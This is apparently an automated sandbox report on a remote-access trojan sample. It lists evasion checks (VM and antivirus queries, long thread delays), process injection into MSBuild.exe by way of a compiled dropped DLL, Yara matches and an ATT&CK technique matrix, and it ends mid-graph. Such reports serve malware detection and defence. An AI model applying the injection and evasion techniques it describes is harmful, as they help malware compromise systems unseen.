            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe PID: 3004, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory allocated: 910000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4FE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 9527Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe TID: 2404Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2500Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2500Thread sleep time: -35971150943733603s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3032Thread sleep count: 9527 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3032Thread sleep count: 310 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: MSBuild.exe, 00000005.00000002.3636871356.00000000013A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, LoadApiName.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, LoadApiName.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, LoadApiName.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num2, length, 12288, 64)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeFile written: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.0.csJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E51008Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20EF.tmp" "c:\Users\user\AppData\Local\Temp\p5qmaywt\CSC46F8F09A99C548C6BA2229A8BF601D.TMP"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.5196.22979.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1194534109.0000000005866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3635736536.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1194620490.000000000586E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1193844237.0000000005860000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1193897780.0000000005865000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3637415749.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe PID: 3004, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: csc.exe PID: 2028, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1304, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dll, type: DROPPED

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2572d78.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.25685e0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.2567fe0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe.4990600.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.csc.exe.586d4b0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1204926419.0000000004990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1194534109.0000000005866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3635736536.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1194620490.000000000586E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1193844237.0000000005860000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1193897780.0000000005865000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1204653550.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3637415749.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe PID: 3004, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: csc.exe PID: 2028, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1304, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\p5qmaywt\p5qmaywt.dll, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            411
            Process Injection
            1
            Masquerading
            OS Credential Dumping111
            Security Software Discovery
            Remote Services11
            Archive Collected Data
            12
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets13
            System Information Discovery
            SSHKeylogging13
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Obfuscated Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631870 Sample: SecuriteInfo.com.Win32.RATX... Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 33 pki-goog.l.google.com 2->33 35 c.pki.goog 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 15 other signatures 2->45 8 SecuriteInfo.com.Win32.RATX-gen.5196.22979.exe 8 2->8         started        signatures3 process4 file5 25 C:\Users\user\AppData\...\p5qmaywt.cmdline, Unicode 8->25 dropped 27 C:\Users\user\AppData\Local\...\p5qmaywt.0.cs, Unicode 8->27 dropped 29 SecuriteInfo.com.W....5196.22979.exe.log, CSV 8->29 dropped 47 Writes to foreign memory regions 8->47 49 Allocates memory in foreign processes 8->49 51 Compiles code for process injection (via .Net compiler) 8->51 53 Injects a PE file into a foreign processes 8->53 12 MSBuild.exe 8->12         started        15 csc.exe 3 8->15         started        18 MSBuild.exe 2 8->18         started        signatures6 process7 dnsIp8 55 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual 